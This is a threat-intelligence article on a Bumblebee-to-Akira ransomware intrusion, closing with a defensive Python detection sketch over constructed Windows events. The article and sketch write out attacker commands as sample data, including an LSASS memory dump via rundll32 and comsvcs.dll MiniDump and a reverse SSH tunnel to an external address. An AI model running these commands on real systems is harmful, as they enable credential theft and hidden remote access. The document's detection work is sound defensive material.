Bumblebee Malware Resurfaces in Campaigns to Deploy Akira Ransomware
Bumblebee malware has resurfaced in a new wave of intrusions tied to the deployment of Akira ransomware. In campaigns observed in May and July 2025, threat actors used SEO poisoning to impersonate legitimate IT software download sites, including one for "ManageEngine OpManager." A case analyzed by The DFIR Report in July 2025 began with a user downloading software from such a fake site and running a trojanized installer that deployed Bumblebee alongside the real application. "The intrusion quickly escalated from a single infected host to a full-scale network compromise," reports The DFIR Report, capturing the speed and severity of the compromise. Notably, the actor returned to the environment two days after the first ransomware deployment, using the RustDesk remote access tool they had installed earlier, and encrypted additional systems. The return is the practical lesson: an intrusion is not over when the first ransom note appears, and recovery has to remove every persistence mechanism the actor left behind, not just the initial loader.
The attack began when a user searched for "ManageEngine OpManager" and was redirected to a malicious domain hosting a trojanized installer. Running the MSI package did two things at once: it installed the legitimate application, and it loaded Bumblebee by sideloading a malicious "msimg32.dll" into the legitimate Windows binary "consent.exe." The malware reached its command-and-control (C2) infrastructure through domains produced by a domain generation algorithm (DGA). Roughly five hours later, a beacon named "AdgNsy.exe," built with the AdaptixC2 adversary emulation framework, was deployed. The beacon launched a burst of internal reconnaissance using built-in Windows binaries: "systeminfo," "nltest /dclist:," "whoami /groups," and "net group domain admins /dom." The actor then created two accounts, one of which was added to the "Enterprise Admins" group, before connecting to a domain controller over RDP and using "wbadmin.exe" to back up and extract the "NTDS.dit" file, the Active Directory database that holds every domain account's password hashes.
Persistence was established by installing the RustDesk remote access tool and setting up an SSH tunnel to an external server. Network scanning continued with a renamed copy of SoftPerfect Network Scanner ("n.exe"), and credential access expanded to a targeted dump of the Veeam backup server's PostgreSQL database, which stores the credentials Veeam uses to reach the systems it backs up. FileZilla was deployed on a file server to exfiltrate data over SFTP. Further credential theft came from dumping LSASS memory with "rundll32.exe" invoking the MiniDump export of "comsvcs.dll." After exfiltration and extensive reconnaissance, the Akira ransomware payload, "locker.exe," was run across multiple systems, encrypting both local files and network shares. Two days later, the same actor returned via RustDesk, accessed a child-domain controller, performed additional discovery, including Invoke-ShareFinder and DNS zone exports, and deployed a second wave of ransomware across the child domain.
The attack chain detailed by The DFIR Report shows a rapid, staged intrusion with privilege escalation, lateral movement, and multiple persistence mechanisms, and each stage leaves telemetry a defender can correlate. The report shares several behavior-based correlation rules: an MSI-based installer followed by a burst of system reconnaissance, credential theft actions, and the tools and processes used to move laterally. Another sequence worth monitoring is the creation of a new account that is immediately used to log on to a different system. Lastly, the installation of a remote access tool followed by SSH activity on the same host is a strong signal. The DFIR Report offers a detailed breakdown of detection and threat hunting opportunities for defending against these damaging, resurgent Bumblebee campaigns.
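A sketch of those correlations, added here as an example and not code from The DFIR Report or this article. It runs over a handful of constructed events in a simplified Sysmon/Security-log shape that mirror the chain described above (the MSI install, the discovery burst, account creation and reuse on another host, RustDesk followed by SSH, and the comsvcs.dll LSASS dump). The host names, account name, time windows, minimum command counts, and the remote-access tool watchlist are assumptions chosen for the example, not values taken from the report.

```python
"""Sequence correlations over constructed Windows telemetry.

Added example, not code from The DFIR Report or this article. Events are
constructed samples in a simplified Sysmon / Security-log shape; windows,
thresholds and tool lists below are assumptions for the example.
"""
from datetime import datetime, timedelta

T = datetime.fromisoformat  # short alias for building timestamps

# (time, host, event_id, fields). event_id 1 = Sysmon process creation,
# 4720 = Security "user account created", 4624 = Security "successful logon".
EVENTS = [
    (T("2025-07-01T10:00:00"), "WS01", 1, {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec.exe /i C:\Users\u\Downloads\OpManager.msi"}),
    (T("2025-07-01T15:05:00"), "WS01", 1, {"Image": r"C:\Windows\System32\systeminfo.exe",
     "CommandLine": "systeminfo"}),
    (T("2025-07-01T15:06:00"), "WS01", 1, {"Image": r"C:\Windows\System32\nltest.exe",
     "CommandLine": "nltest /dclist:"}),
    (T("2025-07-01T15:06:30"), "WS01", 1, {"Image": r"C:\Windows\System32\whoami.exe",
     "CommandLine": "whoami /groups"}),
    (T("2025-07-01T15:07:00"), "WS01", 1, {"Image": r"C:\Windows\System32\net.exe",
     "CommandLine": 'net group "domain admins" /dom'}),
    (T("2025-07-01T15:40:00"), "DC01", 4720, {"TargetUserName": "svc_mon"}),
    (T("2025-07-01T15:52:00"), "FS01", 4624, {"TargetUserName": "svc_mon", "LogonType": "10"}),
    (T("2025-07-01T16:10:00"), "WS01", 1, {"Image": r"C:\Program Files\RustDesk\rustdesk.exe",
     "CommandLine": "rustdesk.exe --install"}),
    (T("2025-07-01T16:25:00"), "WS01", 1, {"Image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "CommandLine": "ssh -N -R 3389:127.0.0.1:3389 user@203.0.113.10"}),
    (T("2025-07-01T17:00:00"), "FS01", 1, {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 712 C:\Temp\l.dmp full"}),
    # Benign control: a lone "whoami /groups" on another host must not alert.
    (T("2025-07-02T09:00:00"), "WS02", 1, {"Image": r"C:\Windows\System32\whoami.exe",
     "CommandLine": "whoami /groups"}),
]

RECON_IMAGES = {"systeminfo.exe", "nltest.exe", "whoami.exe", "net.exe", "net1.exe"}
RAT_IMAGES = {"rustdesk.exe", "anydesk.exe"}  # assumed watchlist; extend for your estate


def base(image):
    """Lower-cased file name of a full image path."""
    return image.rsplit("\\", 1)[-1].lower()


def msi_then_recon(events, window=timedelta(hours=8), min_cmds=3):
    """msiexec on a host followed by >= min_cmds distinct discovery binaries within window."""
    hits = []
    for t0, host, eid, f in events:
        if eid != 1 or base(f["Image"]) != "msiexec.exe":
            continue
        seen = {base(f2["Image"]) for t, h, e, f2 in events
                if e == 1 and h == host and t0 < t <= t0 + window
                and base(f2["Image"]) in RECON_IMAGES}
        if len(seen) >= min_cmds:
            hits.append((host, t0, sorted(seen)))
    return hits


def new_account_used_elsewhere(events, window=timedelta(hours=1)):
    """Account created (4720) on one host, then logs on (4624) to a different host within window."""
    hits = []
    for t0, host, eid, f in events:
        if eid != 4720:
            continue
        user = f["TargetUserName"]
        for t, h, e, f2 in events:
            if e == 4624 and f2["TargetUserName"] == user and h != host and t0 < t <= t0 + window:
                hits.append((user, host, h, f2.get("LogonType")))
    return hits


def rat_then_ssh(events, window=timedelta(hours=2)):
    """Remote-access tool process followed by ssh.exe on the same host within window."""
    hits = []
    for t0, host, eid, f in events:
        if eid != 1 or base(f["Image"]) not in RAT_IMAGES:
            continue
        for t, h, e, f2 in events:
            if e == 1 and h == host and t0 < t <= t0 + window and base(f2["Image"]) == "ssh.exe":
                hits.append((host, base(f["Image"]), f2["CommandLine"]))
    return hits


def comsvcs_minidump(events):
    """Single-event rule: rundll32 invoking comsvcs.dll's MiniDump export (LSASS dump)."""
    return [(h, f["CommandLine"]) for t, h, e, f in events
            if e == 1 and base(f["Image"]) == "rundll32.exe"
            and "comsvcs" in f["CommandLine"].lower() and "minidump" in f["CommandLine"].lower()]


if __name__ == "__main__":
    for rule in (msi_then_recon, new_account_used_elsewhere, rat_then_ssh, comsvcs_minidump):
        for hit in rule(EVENTS):
            print(rule.__name__, hit)
```

In production these would be Sigma rules or SIEM correlation searches rather than Python loops; the point of the sketch is the shape of each rule: a trigger event, a follow-on event on the same host (or, for the account rule, a different host), and a bounded window. The lone "whoami /groups" on WS02 shows why the burst rule requires several distinct discovery binaries after an installer rather than firing on any one of them.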